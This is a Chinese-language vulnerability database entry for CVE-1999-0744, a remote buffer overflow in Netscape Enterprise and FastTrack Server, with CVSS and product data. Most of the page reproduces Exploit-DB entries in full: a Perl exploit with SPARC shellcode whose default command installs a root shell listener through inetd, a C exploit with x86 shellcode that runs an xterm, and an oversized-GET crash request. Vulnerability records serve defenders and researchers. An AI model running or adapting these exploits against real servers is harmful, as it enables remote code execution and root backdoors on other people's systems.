CVE-1999-0744
CVSS7.5
发布时间 :2000-01-04 00:00:00
修订时间 :2008-09-05 16:17:52
NMCOE    

[原文]Buffer overflow in Netscape Enterprise Server and FastTrask Server allows remote attackers to gain privileges via a long HTTP GET request.


[CNNVD]Netscape Enterprise Server 和 FastTrask Server缓冲区溢出漏洞(CNNVD-200001-016)

        Netscape Enterprise Server和FastTrask Server存在缓冲区溢出漏洞。远程攻击者可以超长HTTP GET请求提升特权。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:netscape:enterprise_serverNetscape Enterprise Server
cpe:/a:netscape:fasttrack_serverNetscape FastTrack

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0744
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0744
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200001-016
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/603
(UNKNOWN)  BID  603

- 漏洞信息

Netscape Enterprise Server 和 FastTrask Server缓冲区溢出漏洞
高危 缓冲区溢出
2000-01-04 00:00:00 2005-05-02 00:00:00
远程  
        Netscape Enterprise Server和FastTrask Server存在缓冲区溢出漏洞。远程攻击者可以超长HTTP GET请求提升特权。

- 公告与补丁

        

- 漏洞信息 (263)

Netscape Enterprise Server 4.0/sparc/SunOS 5.7 Remote Exploit (EDBID:263)
solaris remote
2001-01-27 Verified
80 Fyodor
N/A [点击下载]
#!/usr/bin/perl

#
# Remote sploit for Netscape Enterprise Server 4.0/sparc/SunOS 5.7
# usage: ns-shtml.pl ['command line'] | nc victim port
#
# Sometimes server may hang or coredump.. eek ;-)
# fyodor@relaygroup.com

$cmdline="echo 'ingreslock stream tcp nowait root /bin/sh sh -i' > /tmp/bob; /usr/sbin/inetd -s /tmp/bob";
$cmdline=$ARGV[0] if $ARGV[0];


$nop='%80%1b%c0%1f';
$strlen=0x54 + length($cmdline);
$cmdline=~ s/ /%20/g; # encode bad characters..
$strlen=sprintf "%%%x", $strlen;

$shell=
'%20%bf%ff%ff' .#  start:	bn,a <start-4>			  ! super-dooper trick to get current address ;')
'%20%bf%ff%ff' .#  boom:	bn,a  <start>
'%7f%ff%ff%ff' .#  		call boom
'%90%03%e0%48' .#  		add %o7, binksh - boom, %o0       ! put binksh address into %o0
'%92%03%e0%38' .#  		add %o7, argz - boom, %o1         ! put address of argz array into %o1
'%a0%03%e0%51' .#  		add %o7, minusc - boom, %l0       ! put address of -c argument into %l0
'%a2%03%e0%54' .#  		add %o7, cmdline - boom, %l1      ! put address of command line argument into %l1
'%c0%2b%e0%50' .#  		stb %g0, [ %o7 + minusc-boom-1 ]  ! put ending zero byte at the end of /bin/sh
'%c0%2b%e0%53' .#		stb %g0, [ %o7 + cmdline-boom-1 ] ! put ending zero byte at the end of -c
'%c0%2b%e0' . $strlen .#        stb %g0, [ %o7 + endmark-boom-1 ] ! put ending zero byte at the end of command line
'%d0%23%e0%38' .#		st %o0, [ %o7 + argz-boom ]       ! store pointer to ksh into 0 element of argz
'%e0%23%e0%3c' .#		st %l0, [ %o7 + argz-boom+4 ]     ! store pointer to -c into 1 element of argz
'%e2%23%e0%40' .#		st %l1, [ %o7 + argz-boom+8 ]     ! store pointer to cmdline into 2 element of argz
'%c0%23%e0%44' .#		st %g0, [ %o7 + argz-boom+12 ]    ! store NULL pointer at the end
'%82%10%20%0b' .#		mov 0xb, %g1
'%91%d0%20%08' .#		ta 8
'%ff%ff%ff%ff'.  # 40	argz: 0xffffffff;
'%ff%ff%ff%ff'.   # 44	      0xffffffff;
'%ff%ff%ff%ff'.   # 48        0xffffffff;
'%ff%ff%ff%ff'.   # 52	      0xffffffff;
'/bin/kshA' .     # 56  binksh: "/bin/kshA";
'-cA' . $cmdline . 'A'; # cmdline: "blahblahA";

##################################################
# Generate huge GET /..<shellcode>...shtml here  #
##################################################
$padd=814-length($shell);
print STDERR "pad is $padd\n";

print "GET /";

print $nop x 40;
print $she11;
print "A"x $padd;

print "\xfd\xe7%dc\x80"; # %i0
print "AAAA"; # %i1
print "AAAA"; # %i2
print "AAAA"; # %i3
print "AAAA"; # %i4
print "AAAA"; # %i5
print '%fd%c3%16%58'; #%fp (%i6)
print '%ff%21%d7%ac'; # %i7
print "A"x1200;

print ".shtml HTTP/1.0\n\n";


# milw0rm.com [2001-01-27]
		

- 漏洞信息 (19705)

Netscape FastTrack Server 2.0.1 a GET Buffer Overflow Vulnerability (EDBID:19705)
unixware remote
1999-12-31 Verified
0 Brock Tellier
N/A [点击下载]
source: http://www.securityfocus.com/bid/908/info

The version of Netscape FastTrack server that ships with UnixWare 7.1 is vulnerable to a remote buffer overlow. By default, the httpd listens on port 457 of the UnixWare host and serves documentation via http. If you pass the server a GET request with more than 367 characters, the stack overflows and the EIP is overwritten making it possible to execute arbitrary code with the privileges of the httpd (usually nobody).

/** uwhelp.c - remote exploit for UnixWare's Netscape FastTrack =

 **            2.01a scohelp http service
 **
 ** Runs the command of your choice with uid of the http daemon
 ** (probably nobody).  If there are spaces in your command, use
 ** ${IFS} instead of a space.  httpd handles execve's strangely,
 ** so your best bet is to just exec an xterm as I've done below.
 ** Obviously, change the command below to suit your needs.
 **
 ** Compile on UW7.1: cc -o uwhelp uwhelp.c -lnsl -lsocket
 ** run: ./uwhelp hostname <offset> <size>
 **
 **
 ** Brock Tellier btellier@usa.net
 **
 **/

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/errno.h>
#include <netdb.h>

#define BUFLEN 1000
#define NOP 0x90
#define LEN 102

char shell[] =3D /* Cheez Whiz, cheezbeast@hotmail.com */
"\xeb\x5f"                         /* jmp springboard       */
"\x9a\xff\xff\xff\xff\x07\xff"     /* lcall 0x7,0x0         */
"\xc3"                             /* ret                   */
"\x5e"                             /* popl %esi             */
"\x31\xc0"                         /* xor %eax,%eax         */
"\x89\x46\x9d"                     /* movl %eax,-0x63(%esi) */
"\x88\x46\xa2"                     /* movb %al,-0x5e(%esi)  */
"\x31\xc0"                         /* xor %eax,%eax         */
"\x50"                             /* pushl %eax            */
"\xb0\x8d"                         /* movb $0x8d,%al        */
"\xe8\xe5\xff\xff\xff"             /* call syscall          */
"\x83\xc4\x04"                     /* addl $0x4,%esp        */
"\x31\xc0"                         /* xor %eax,%eax         */
"\x50"                             /* pushl %eax            */
"\xb0\x17"                         /* movb $0x17,%al        */
"\xe8\xd8\xff\xff\xff"             /* call syscall          */
"\x83\xc4\x04"                     /* addl $0x4,%esp        */
"\x31\xc0"                         /* xor %eax,%eax         */
"\x50"                             /* pushl %eax            */
"\x56"                             /* pushl %esi            */
"\x8b\x1e"                         /* movl (%esi),%ebx      */
"\xf7\xdb"                         /* negl %ebx             */
"\x89\xf7"                         /* movl %esi,%edi        */
"\x83\xc7\x10"                     /* addl $0x10,%edi       */
"\x57"                             /* pushl %edi            */
"\x89\x3e"                         /* movl %edi,(%esi)      */
"\x83\xc7\x08"                     /* addl $0x8,%edi        */
"\x88\x47\xff"                     /* movb %al,-0x1(%edi)   */
"\x89\x7e\x04"                     /* movl %edi,0x4(%esi)   */
"\x83\xc7\x03"                     /* addl $0x3,%edi        */
"\x88\x47\xff"                     /* movb %al,-0x1(%edi)   */
"\x89\x7e\x08"                     /* movl %edi,0x8(%esi)   */
"\x01\xdf"                         /* addl %ebx,%edi        */
"\x88\x47\xff"                     /* movb %al,-0x1(%edi)   */
"\x89\x46\x0c"                     /* movl %eax,0xc(%esi)   */
"\xb0\x3b"                         /* movb $0x3b,%al        */
"\xe8\xa4\xff\xff\xff"             /* call syscall          */
"\x83\xc4\x0c"                     /* addl $0xc,%esp        */
"\xe8\xa4\xff\xff\xff"             /* call start            */
"\xff\xff\xff\xff"                 /* DATA                  */
"\xff\xff\xff\xff"                 /* DATA                  */
"\xff\xff\xff\xff"                 /* DATA                  */
"\xff\xff\xff\xff"                 /* DATA                  */
"\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA                  */
"\x2d\x63\xff";                    /* DATA                  */

char *auth=3D
" HTTP/1.0\r\n"
"Host: localhost:457\r\n"
"Accept: text/html\r\n"
"Accept-Encoding: gzip, compress\r\n"
"Accept-Language: en\r\n"
"Negotiate: trans\r\n"
"User-Agent: xnec\r\n";

char buf[BUFLEN];
char exploit[BUFLEN];
char *cmd =3D "/usr/X/bin/xterm${IFS}-display${IFS}unix:0.0";
int len,i,sock;
int size =3D 368;
int offset=3D300;
int port =3D 457;
long sp =3D 0xbffc6004;
//unsigned long sp =3D (unsigned long)&sp;
struct  sockaddr_in sock_a;
struct  hostent *host;

void main (int argc, char *argv[]) {
        =

 if(argc < 2) {
   fprintf(stderr, "Error:Usage: %s <hostname> \n", argv[0]);
   exit(0);
  }
 if(argc > 2) offset=3Datoi(argv[2]);
 if(argc > 3) size=3Datoi(argv[3]);
 =

 sp =3D sp + offset;

 memset(exploit, NOP, size - strlen(shell) - strlen(cmd)- 6);

 /* put size of *cmd into shellcode */
 len =3D strlen(cmd); len++; len =3D -len;
 shell[LEN+0] =3D (len >>  0) & 0xff;
 shell[LEN+1] =3D (len >>  8) & 0xff;
 shell[LEN+2] =3D (len >> 16) & 0xff;
 shell[LEN+3] =3D (len >> 24) & 0xff;

 memcpy(exploit+(size-strlen(shell)-strlen(cmd)-6), shell, strlen(shell))=
;
 memcpy(exploit+(size-strlen(cmd)-6), cmd,strlen(cmd));
 memcpy(exploit+(size-6),"\xff",1);
 =


 exploit[size-5]=3D(sp & 0x000000ff);
 exploit[size-4]=3D(sp & 0x0000ff00) >> 8;
 exploit[size-3]=3D(sp & 0x00ff0000) >> 16;
 exploit[size-2]=3D(sp & 0xff000000) >> 24;
 exploit[size-1]=3D0; =


 sprintf(buf, "GET /%s %s%s\r\n\r\n", exploit, auth,exploit);

 buf[BUFLEN - 1] =3D 0;

 fprintf(stderr, "httpd remote exploit for UnixWare 7.1\n");
 fprintf(stderr, "using addr 0x%x offset %d\n", sp, offset);
 fprintf(stderr, "Brock Tellier btellier@usa.net\n");

 if((host=3D(struct hostent *)gethostbyname(argv[1])) =3D=3D NULL) {
    perror("gethostbyname"); =

    exit(-1);
  }
 =

 if((sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
    perror("create socket");
    exit(-1);
  }

 sock_a.sin_family=3DAF_INET;
 sock_a.sin_port=3Dhtons(port);
 memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);
 if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=3D0) {
    perror("create connect");
    exit(-1);
  }

  fflush(stdout);

  // write exploit
  write(sock,buf,strlen(buf));

}		

- 漏洞信息 (19783)

Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 GET Request Vulnerability (EDBID:19783)
windows dos
1999-08-25 Verified
0 ISS X-Force
N/A [点击下载]
source: http://www.securityfocus.com/bid/1024/info

A GET request containing over 4080 characters will cause the httpd.exe process to crash within Netscape Enterprise Server 3.6, resulting in a Dr. Watson error. Arbitrary code can be executed remotely at this point. 

Netscape Enterprise Server 3.5 running on either Netware or Solaris is not known to be susceptible to this issue.

GET /(4080 character string) HTTP/1.0		

- 漏洞信息

11446
Netscape Enterprise / FastTrack Server HTTP GET Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

1999-08-02 Unknow
1999-08-02 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站